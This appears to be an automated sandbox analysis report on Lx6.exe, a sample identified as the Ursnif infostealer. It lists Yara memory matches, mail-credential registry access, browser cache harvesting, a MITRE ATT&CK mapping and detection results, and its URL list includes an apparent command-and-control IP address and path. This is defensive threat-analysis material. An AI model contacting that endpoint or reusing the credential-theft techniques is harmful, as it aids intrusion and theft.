Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000e
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000f
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000c
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000d
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_0
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000001
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000002
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000010
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000011
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000005
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000003
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000004
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_1
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000009
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_2
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\data_3
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000007
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\index
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_000008
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000a
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\cache\Cache_Data\f_00000b

Remote Access Functionality

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.345037637.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.448346739.0000021F4E42C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.797117196.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344925782.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712648005.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708638922.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.685282476.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.856104544.000001489B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.721107955.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345194769.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345092170.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390766199.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389500778.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.390744160.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389768028.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 1716, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 3536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cvtres.exe PID: 5240, type: MEMORYSTR
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Lx6.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.d294a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.109d4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.111c4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Lx6.exe.1148948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000043.00000000.773575293.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389553565.000000000109D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.493910135.000000000111D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.771438221.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.667603922.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.389654961.000000000111C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000043.00000000.769688179.000001FA9D6F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.703497252.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.763965956.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.596069262.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.704474059.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.762259112.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681894423.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.816576347.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003E.00000000.760746671.0000019933F90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495743811.0000000000D29000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.702640862.000001CEDB3E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.818431890.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000059.00000000.820005242.000001AF8B6D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.656463020.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.802729381.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.625911169.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.630294105.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.590960903.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.680178718.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.814285126.0000021F457F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.576910703.000002240CA50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.495247062.0000000001148000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000000.681232862.0000000003020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.497852767.0000000001181000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.801073925.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000058.00000000.799390295.0000024EF5620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000000.635166996.000001D023AD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000000.673085569.000001489BB00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Valid Accounts	421 Windows Management Instrumentation	1 Valid Accounts	1 Valid Accounts	1 Obfuscated Files or Information	1 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	2 Native API	1 Windows Service	1 Access Token Manipulation	1 Software Packing	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	1 Windows Service	1 File Deletion	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	11 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Service Execution	Logon Script (Mac)	813 Process Injection	1 Masquerading	NTDS	148 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	12 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Valid Accounts	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Modify Registry	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	4 Process Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	813 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Rundll32	Network Sniffing	21 Remote System Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Right-to-Left Override	Input Capture	3 System Network Configuration Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Lx6.exe	67%	ReversingLabs	Win32.Infostealer.Convagent
Lx6.exe	64%	Virustotal		Browse
Lx6.exe	100%	Avira	TR/Crypt.XPACK.Gen7
Lx6.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.0.Lx6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.2.Lx6.exe.420000.1.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
0.2.Lx6.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://curlmyip.net1g71lXXnduT6klnGfile://c:	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://194.76.225.61/doorway/uRv392Rtz866/nti_2ByAL1r/R8CkJ_2BndSyRx/sIG44fcYL4SmExCi0ACI7/oER1nF0Bt2Tpxtf8/pvf2xzyDmqE4uH6/atElJIeiaCGvRyaYTW/O_2Bb7sZx/7GOqqpJyOKdZvhgFoplL/gFpgB_2BgQj834VvyfM/T9x1pruFqGyVhzjoXgN9Yh/z5CHc_2FavqJW/MXQOJsyO/VzU5_2FcjvOlXkGZhClQ7RM/oSy78PufE2/FJvd3_2FTRM8OrG4Y/ryVNLZn8s_2B/KVoRzz7Jpgf/a.gif	0%	Avira URL Cloud	safe
http://ns.adobp/E	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
